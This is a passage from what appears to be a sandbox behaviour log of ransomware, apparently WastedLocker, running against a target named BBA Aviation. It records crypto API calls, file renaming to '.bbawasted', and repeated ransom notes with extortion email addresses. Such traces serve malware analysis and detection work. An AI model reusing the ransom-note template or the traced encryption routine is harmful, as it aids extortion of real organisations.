dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x47e) returned 0x640000 [0164.218] CloseHandle (hObject=0x288) returned 1 [0164.226] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0164.226] CloseHandle (hObject=0x28c) returned 1 [0164.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0164.226] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6708) returned 1 [0164.227] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0164.227] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0164.227] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6680) returned 1 [0164.228] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0164.228] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0164.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0164.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0164.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0164.237] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]OPqBEOhTq2zJ/czkltCebF2GglYuTeUlkJtZ8ws33Lpum7aKME/ggvlyjmkNk+ll\r\nXtQKNlPrfjn9V1V/24OV0B72vakz6LGGPsRI3sHuDXuIdoE+XIt2Dfpka6ofwyUb\r\nzGYQW86Rk0bXceRoh/BCfl60W7xHoSbX8rW1ykKDwDyyHgtJ38rhoffGd3fcnOit\r\nMqmJYu2e+cyYwlm+n5bvhmP+EpdkkeAHyhl8+7EoV2zGUTFSREJ2IghQnLu/ymzI\r\nQRqAWlx40npyUytLnsjxeB1Qx9S4MYEDQJ4atZIzK8ki3UyXYdNJAwdwUQfbFGwa\r\nRYzPBf1FyZAmdqi+1w0F7XRPYWCs0GVTjzb25yEp2RC5W80a9ifkUFUrkR5xYvj8\r\n5e+JBHBuBDRX893zQpF/5AgZnteTdz0ARGhOUs5l2k++dY2zmw8usf+r3Ay51WEP\r\nFlMccWuGIZwHl+Tkhch+NaX2QDPnoxNnaYpvzhKRp0marO5xQTIgpUxdIKF+augu\r\n+vjmHbvvsRRxhyrk/blLo2eACrZ4D4fSsDEUFyv0KFfdBSXraYKFiYO6/KcreYmp\r\n9IOg5NIpaHNF85BQfxk4t5N9/IxczVaFnm5RBKWsUNLFCgI16/EssszzR1eTQmgJ\r\nim6+niMj6VNg7dWBkHnpl9IvRCLEGzK5ILeZu9kpNc0=[end_key]\r\nKEEP IT\r\n") returned 984 [0164.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0164.284] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0164.285] SetEndOfFile (hFile=0x294) returned 1 [0164.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0164.325] CloseHandle (hObject=0x294) returned 1 [0164.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0164.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1838 | out: hHeap=0x660000) returned 1 [0164.329] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6708) returned 1 [0164.330] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0164.330] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0164.330] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 43 [0164.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x260) returned 0x69e318 [0164.330] lstrcpyW (in: lpString1=0x69e36e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0164.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0164.330] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6708) returned 1 [0164.768] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0164.769] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0164.769] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0164.770] WriteFile (in: hFile=0x288, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0164.771] SetEndOfFile (hFile=0x288) returned 1 [0164.771] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.771] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0164.771] lstrcpyW (in: lpString1=0x69e36e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0164.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico.bbawasted")) returned 1 [0164.772] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0164.772] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0164.773] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x2796 [0164.773] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2796) returned 0x640000 [0164.773] CloseHandle (hObject=0x27c) returned 1 [0164.776] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0164.777] CloseHandle (hObject=0x294) returned 1 [0164.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0164.777] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6020) returned 1 [0164.777] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0164.777] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0164.778] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6708) returned 1 [0164.778] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0164.778] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0164.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0164.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0164.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0164.788] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]EPZGKbkFvpjren6Fka82v77x8TmKJgFPDpT9HBmTFZ6QcLMXNr2glLTKl6R8Majd\r\n6g+tfPxpuQHvP8j08y5gIokee2LhsGhkERP0emQBsMmSidOF1GjMQnNWH99kQQcA\r\nRw8lyT9W/SWnZlJyvGeCqo2PcNTvF3EBYe/LzkV4dMjxa7Gukw96dcPtGkVFVlpj\r\nnKkvYukZIh05xqspeJNW/F82MX4wCOVJmjW7DB/K/bP1wNfFaLSK+k3O9WJnT/km\r\ndnaQc9maSjNQMs4B1F4TNZYeuRrvYxb0Btkdtf1bHFbWg9uC3/NGfHng2hzisecz\r\nd7IExnxqEw9GxLlVQSjWkTPmf6wlgCLVuDVGMOoJcSjINAJhqWHp02TflwluRrem\r\n24pIOoMfXop09TCN12xAV+BdebE6c9dM+gP2RoFbWcXCaQagdSH2Dek/kRg5APiO\r\nOV/PbGS3fN5EP/g+X8PRp3vRUzXLJkdpUZYfzZ5thf0IWM7G5hxbg1Mc6tvgbhIi\r\nhtbT3nQZwjI6yoYHc5OHfz/TjqJGEwJZENyKyHlMkb0l8g0mr0C/9Q/iUcTFNppD\r\nrbUaxxEAOT+9RqfyfMH/Jiza9Tb5/lMPj+xSO2MQslljyLctfamDOkRAJ93/BvSO\r\nNg1lo+yMykw0ylINW4Grb/PkO6raRLNECbkDpwkLt4w=[end_key]\r\nKEEP IT\r\n") returned 984 [0164.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0164.788] WriteFile (in: hFile=0x288, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0164.789] SetEndOfFile (hFile=0x288) returned 1 [0164.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0164.791] CloseHandle (hObject=0x288) returned 1 [0164.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0164.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66e840 | out: hHeap=0x660000) returned 1 [0164.796] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6460) returned 1 [0164.797] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0164.797] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0164.797] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 40 [0164.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25a) returned 0x69e318 [0164.797] lstrcpyW (in: lpString1=0x69e368, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0164.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0164.797] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6c58) returned 1 [0164.798] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0164.798] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0164.798] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0164.799] WriteFile (in: hFile=0x288, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0164.800] SetEndOfFile (hFile=0x288) returned 1 [0164.875] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.875] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0164.875] lstrcpyW (in: lpString1=0x69e368, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0164.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz.bbawasted" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.bbawasted")) returned 1 [0164.876] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz.bbawasted" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0164.876] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0164.877] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xad1384b [0164.877] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4000000) returned 0x3db0000 [0164.880] CloseHandle (hObject=0x280) returned 1 [0176.531] UnmapViewOfFile (lpBaseAddress=0x3db0000) [0179.987] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x4000000, dwNumberOfBytesToMap=0x4000000) returned 0x1480000 [0190.399] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0194.811] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x8000000, dwNumberOfBytesToMap=0x2d1384b) returned 0x1480000 [0199.489] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0201.768] CloseHandle (hObject=0x290) returned 1 [0201.768] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0201.768] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a65f8) returned 1 [0201.769] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0201.769] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0201.769] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6b48) returned 1 [0201.770] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0201.770] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0201.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0201.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0201.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0201.779] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]APxY43A4WSdwoDZ8ckxSTl9A8Q9kn5akUAlv1Nukq8KOMG5DqJe9tg6RAFs6Nh6R\r\nuOsiIYdnq8q1Qv6Q+TqbBU+tYCa03ph9BVFvpXK0a4OqduTDBXTFznQ6qwudo5HE\r\nFjic2gEVm6ipgHTTbGXyJw+dS0IqEkhmpBMHIwDegsZVLKTnNhIT0NoPHbqNkluK\r\nt1ZJbc9ohUz6Rl8yYhVfYaXv2ItDFz1RPMNsv5/wEpfY0AISNYlbzuFtFk22Rqec\r\nLLmeuDzN0aaG6oXrb36yiDLpuWBPlZphnnTqN3v2BXXtpfacTNYvE/iueHzexh6b\r\nreQKjsh4DYlm+AF5wuWq0Vvud+lfemKWGNv3y8aatM67yy0w//Dz3TAMW3ZqY4BL\r\nmM1Jql80dVCxNUZAJ5reT+sbUvaLTSeR8P7EewdI5dX0Kk8+3eehCZsxTGxr9SUL\r\nJbk0w7Bzi24ZvYIhp563vWoW2M3paEGIp711Jk0ZkAAxqdEh8GF7MyTP4dDbKKuM\r\n/mjT25jm4QJMm3Ukqk0g5LVg7EJfbeJnx6eFY40uK2rEFlFWDJsqqjdCErJ/Kx3n\r\nmCe+HA8ws8DWQ5LWMesWSNb1TqN1BP4jWauyMpjWQGhCT9hZGqF2NqJelfcgsaPs\r\nSAX4J6IUYyhMk48kKiP7M8vZbbF/LR9Ae/6G4iFWtOJ=[end_key]\r\nKEEP IT\r\n") returned 984 [0201.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0201.779] WriteFile (in: hFile=0x288, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0201.779] SetEndOfFile (hFile=0x288) returned 1 [0201.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0201.782] CloseHandle (hObject=0x288) returned 1 [0201.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0201.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66e8f0 | out: hHeap=0x660000) returned 1 [0201.784] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6240) returned 1 [0201.785] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0201.785] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0201.785] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0201.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x252) returned 0x6aecf0 [0201.785] lstrcpyW (in: lpString1=0x6aed38, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0201.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0201.785] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a69b0) returned 1 [0201.785] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0201.786] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0201.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat.log1.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0201.786] WriteFile (in: hFile=0x288, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0201.788] SetEndOfFile (hFile=0x288) returned 1 [0201.788] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0201.788] lstrcpyW (in: lpString1=0x6aed38, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0201.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat.log1.bbawasted")) returned 1 [0201.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat.log1.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0201.789] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0201.790] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x6000 [0201.790] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6000) returned 0x640000 [0201.790] CloseHandle (hObject=0x290) returned 1 [0201.796] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0201.796] CloseHandle (hObject=0x294) returned 1 [0201.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0201.796] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6570) returned 1 [0201.797] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0201.797] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0201.797] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6ce0) returned 1 [0201.798] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0201.798] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0201.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0201.807] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0201.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0201.807] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 